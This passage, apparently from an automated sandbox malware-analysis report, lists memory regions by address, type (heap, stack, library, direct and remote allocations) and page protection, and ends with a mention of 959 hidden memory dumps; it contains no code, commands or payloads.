page read and write
|
||
|
49AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B2869D000
|
heap
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
23B2839F000
|
heap
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
23B2827C000
|
heap
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
7705000
|
heap
|
page read and write
|
||
|
888D000
|
stack
|
page read and write
|
||
|
278A000
|
trusted library allocation
|
page execute and read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
291A6B00000
|
heap
|
page execute and read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
2553C000
|
stack
|
page read and write
|
||
|
23B2638B000
|
heap
|
page read and write
|
||
|
23B28338000
|
heap
|
page read and write
|
||
|
8600000
|
heap
|
page read and write
|
||
|
98C0000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
291BEE73000
|
heap
|
page read and write
|
||
|
8908000
|
heap
|
page read and write
|
||
|
23B2637E000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F6A000
|
heap
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
8B20000
|
trusted library allocation
|
page read and write
|
||
|
291A6640000
|
trusted library allocation
|
page read and write
|
||
|
878B000
|
stack
|
page read and write
|
||
|
23B2831C000
|
heap
|
page read and write
|
||
|
257BF000
|
trusted library allocation
|
page read and write
|
||
|
23B284B6000
|
heap
|
page read and write
|
||
|
291A6785000
|
heap
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B2832D000
|
heap
|
page read and write
|
||
|
AD7DA7E000
|
stack
|
page read and write
|
||
|
23B28330000
|
heap
|
page read and write
|
||
|
23B2838F000
|
heap
|
page read and write
|
||
|
23B282A3000
|
heap
|
page read and write
|
||
|
23B282B7000
|
heap
|
page read and write
|
||
|
27A7E000
|
stack
|
page read and write
|
||
|
9B12000
|
heap
|
page read and write
|
||
|
291A4CB3000
|
heap
|
page read and write
|
||
|
23B2848B000
|
heap
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
23B2869B000
|
heap
|
page read and write
|
||
|
4A98000
|
heap
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
5BF9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
23B28143000
|
heap
|
page read and write
|
||
|
88B34FF000
|
unkown
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
88EA000
|
heap
|
page read and write
|
||
|
23B282A3000
|
heap
|
page read and write
|
||
|
253A0000
|
trusted library allocation
|
page read and write
|
||
|
23B284A9000
|
heap
|
page read and write
|
||
|
23B2835A000
|
heap
|
page read and write
|
||
|
23B28157000
|
heap
|
page read and write
|
||
|
23B28298000
|
heap
|
page read and write
|
||
|
23B281B8000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
256C0000
|
heap
|
page execute and read and write
|
||
|
766E000
|
heap
|
page read and write
|
||
|
23B262F0000
|
heap
|
page read and write
|
||
|
23B27C70000
|
remote allocation
|
page read and write
|
||
|
2780000
|
trusted library allocation
|
page read and write
|
||
|
9A95000
|
heap
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
23B282C3000
|
heap
|
page read and write
|
||
|
4990000
|
trusted library allocation
|
page read and write
|
||
|
23B28561000
|
heap
|
page read and write
|
||
|
23B28292000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
868C000
|
stack
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
27C63000
|
trusted library allocation
|
page read and write
|
||
|
2545E000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
2795000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
AD7ED0B000
|
stack
|
page read and write
|
||
|
9A83000
|
heap
|
page read and write
|
||
|
5243000
|
trusted library allocation
|
page read and write
|
||
|
23B281B5000
|
heap
|
page read and write
|
||
|
23B28373000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
23B28711000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
9B24000
|
heap
|
page read and write
|
||
|
2EA3000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library section
|
page read and write
|
||
|
2E9E000
|
unkown
|
page read and write
|
||
|
4FA93FE000
|
stack
|
page read and write
|
||
|
23B2826C000
|
heap
|
page read and write
|
||
|
27CB0000
|
trusted library allocation
|
page read and write
|
||
|
2E37000
|
stack
|
page read and write
|
||
|
E396000
|
direct allocation
|
page execute and read and write
|
||
|
7360000
|
heap
|
page read and write
|
||
|
23B28357000
|
heap
|
page read and write
|
||
|
9B50000
|
direct allocation
|
page read and write
|
||
|
88AD000
|
heap
|
page read and write
|
||
|
291A7307000
|
trusted library allocation
|
page read and write
|
||
|
23B28563000
|
heap
|
page read and write
|
||
|
9C20000
|
direct allocation
|
page read and write
|
||
|
23B2817B000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B2827C000
|
heap
|
page read and write
|
||
|
23B28B31000
|
heap
|
page read and write
|
||
|
23B281AD000
|
heap
|
page read and write
|
||
|
23B28292000
|
heap
|
page read and write
|
||
|
27C71000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
88B9000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
4FA91FE000
|
stack
|
page read and write
|
||
|
23B27CD0000
|
heap
|
page read and write
|
||
|
23B2833D000
|
heap
|
page read and write
|
||
|
23B28189000
|
heap
|
page read and write
|
||
|
291A4C85000
|
heap
|
page read and write
|
||
|
23B2814A000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
23B281BD000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B283A9000
|
heap
|
page read and write
|
||
|
88C1000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
267E6000
|
trusted library allocation
|
page read and write
|
||
|
3039000
|
heap
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
277C8000
|
heap
|
page read and write
|
||
|
2BCC000
|
stack
|
page read and write
|
||
|
291A6670000
|
heap
|
page readonly
|
||
|
23B28292000
|
heap
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
291A4FF0000
|
heap
|
page read and write
|
||
|
25550000
|
trusted library allocation
|
page read and write
|
||
|
49B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
700E000
|
stack
|
page read and write
|
||
|
25560000
|
remote allocation
|
page read and write
|
||
|
334A000
|
heap
|
page read and write
|
||
|
28510000
|
trusted library allocation
|
page read and write
|
||
|
23B281BD000
|
heap
|
page read and write
|
||
|
2790000
|
trusted library allocation
|
page read and write
|
||
|
712B000
|
stack
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
23B28532000
|
heap
|
page read and write
|
||
|
23B2827C000
|
heap
|
page read and write
|
||
|
2786000
|
trusted library allocation
|
page execute and read and write
|
||
|
25308000
|
trusted library allocation
|
page read and write
|
||
|
890B000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
49A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
23B28311000
|
heap
|
page read and write
|
||
|
23B2835A000
|
heap
|
page read and write
|
||
|
27CC0000
|
trusted library allocation
|
page read and write
|
||
|
23B282C1000
|
heap
|
page read and write
|
||
|
AD7DC7E000
|
stack
|
page read and write
|
||
|
23B2819C000
|
heap
|
page read and write
|
||
|
23B28376000
|
heap
|
page read and write
|
||
|
AD7D78F000
|
stack
|
page read and write
|
||
|
27CB0000
|
trusted library allocation
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
291A69F1000
|
heap
|
page read and write
|
||
|
27C40000
|
trusted library allocation
|
page read and write
|
||
|
23B28497000
|
heap
|
page read and write
|
||
|
AD7DB7C000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B26270000
|
heap
|
page read and write
|
||
|
6546000
|
remote allocation
|
page execute and read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
23B2638B000
|
heap
|
page read and write
|
||
|
2F48000
|
heap
|
page read and write
|
||
|
98F7000
|
heap
|
page read and write
|
||
|
291A88AD000
|
trusted library allocation
|
page read and write
|
||
|
9396000
|
direct allocation
|
page execute and read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
23B28482000
|
heap
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
8550000
|
heap
|
page read and write
|
||
|
267A9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
23B26371000
|
heap
|
page read and write
|
||
|
254B0000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
291A72B7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
4B50000
|
trusted library allocation
|
page read and write
|
||
|
27AFE000
|
stack
|
page read and write
|
||
|
291BF2F0000
|
heap
|
page read and write
|
||
|
23B262F1000
|
heap
|
page read and write
|
||
|
730E000
|
stack
|
page read and write
|
||
|
AD7ED8B000
|
stack
|
page read and write
|
||
|
23B2812E000
|
heap
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
291A4C2D000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
9A4F000
|
stack
|
page read and write
|
||
|
27C90000
|
trusted library allocation
|
page read and write
|
||
|
9AB1000
|
heap
|
page read and write
|
||
|
251F0000
|
direct allocation
|
page read and write
|
||
|
291A6930000
|
heap
|
page read and write
|
||
|
8890000
|
heap
|
page read and write
|
||
|
B196000
|
direct allocation
|
page execute and read and write
|
||
|
291A4C10000
|
heap
|
page read and write
|
||
|
276D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
291A4CAF000
|
heap
|
page read and write
|
||
|
7095000
|
heap
|
page execute and read and write
|
||
|
27807000
|
heap
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
23B28697000
|
heap
|
page read and write
|
||
|
88B35FF000
|
stack
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
27CD0000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
728D000
|
stack
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
9C70000
|
direct allocation
|
page read and write
|
||
|
27C90000
|
trusted library allocation
|
page read and write
|
||
|
7170000
|
direct allocation
|
page read and write
|
||
|
291A66B2000
|
trusted library allocation
|
page read and write
|
||
|
23B28319000
|
heap
|
page read and write
|
||
|
291A4E10000
|
heap
|
page read and write
|
||
|
291A6940000
|
heap
|
page read and write
|
||
|
291A879F000
|
trusted library allocation
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
27CB0000
|
trusted library allocation
|
page read and write
|
||
|
23B2835B000
|
heap
|
page read and write
|
||
|
27CA0000
|
trusted library allocation
|
page read and write
|
||
|
291B6DFC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
23B2638B000
|
heap
|
page read and write
|
||
|
4B3E000
|
stack
|
page read and write
|
||
|
8B60000
|
direct allocation
|
page read and write
|
||
|
23B28396000
|
heap
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
2F6C000
|
heap
|
page read and write
|
||
|
23B28298000
|
heap
|
page read and write
|
||
|
23B2829B000
|
heap
|
page read and write
|
||
|
ED96000
|
direct allocation
|
page execute and read and write
|
||
|
23B281A8000
|
heap
|
page read and write
|
||
|
1C6734C0000
|
heap
|
page read and write
|
||
|
764D000
|
heap
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
23B262F1000
|
heap
|
page read and write
|
||
|
5BD1000
|
trusted library allocation
|
page read and write
|
||
|
25570000
|
heap
|
page read and write
|
||
|
23B28513000
|
heap
|
page read and write
|
||
|
23B285F4000
|
heap
|
page read and write
|
||
|
AD7DBFE000
|
stack
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
23B262F7000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
291A72E0000
|
trusted library allocation
|
page read and write
|
||
|
291A6A60000
|
heap
|
page execute and read and write
|
||
|
23B2816B000
|
heap
|
page read and write
|
||
|
9AD8000
|
heap
|
page read and write
|
||
|
5D5F000
|
trusted library allocation
|
page read and write
|
||
|
76F6000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
23B28194000
|
heap
|
page read and write
|
||
|
23B28324000
|
heap
|
page read and write
|
||
|
277C0000
|
heap
|
page read and write
|
||
|
23B28333000
|
heap
|
page read and write
|
||
|
2763000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
27CA0000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
direct allocation
|
page read and write
|
||
|
1C673815000
|
heap
|
page read and write
|
||
|
291A66F0000
|
trusted library allocation
|
page read and write
|
||
|
AD7EB8E000
|
stack
|
page read and write
|
||
|
27C90000
|
trusted library allocation
|
page read and write
|
||
|
23B28110000
|
heap
|
page read and write
|
||
|
291BEFC1000
|
heap
|
page read and write
|
||
|
4FA99FF000
|
stack
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
8B50000
|
direct allocation
|
page read and write
|
||
|
291A7275000
|
trusted library allocation
|
page read and write
|
||
|
23B28697000
|
heap
|
page read and write
|
||
|
92B0000
|
direct allocation
|
page execute and read and write
|
||
|
8346000
|
remote allocation
|
page execute and read and write
|
||
|
7946000
|
remote allocation
|
page execute and read and write
|
||
|
27CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B3A000
|
heap
|
page read and write
|
||
|
27C97000
|
trusted library allocation
|
page read and write
|
||
|
27C61000
|
trusted library allocation
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
AD7DAFE000
|
stack
|
page read and write
|
||
|
27839000
|
heap
|
page read and write
|
||
|
23B263A0000
|
heap
|
page read and write
|
||
|
25560000
|
remote allocation
|
page read and write
|
||
|
23B284AC000
|
heap
|
page read and write
|
There are 959 hidden memdumps, click here to show them.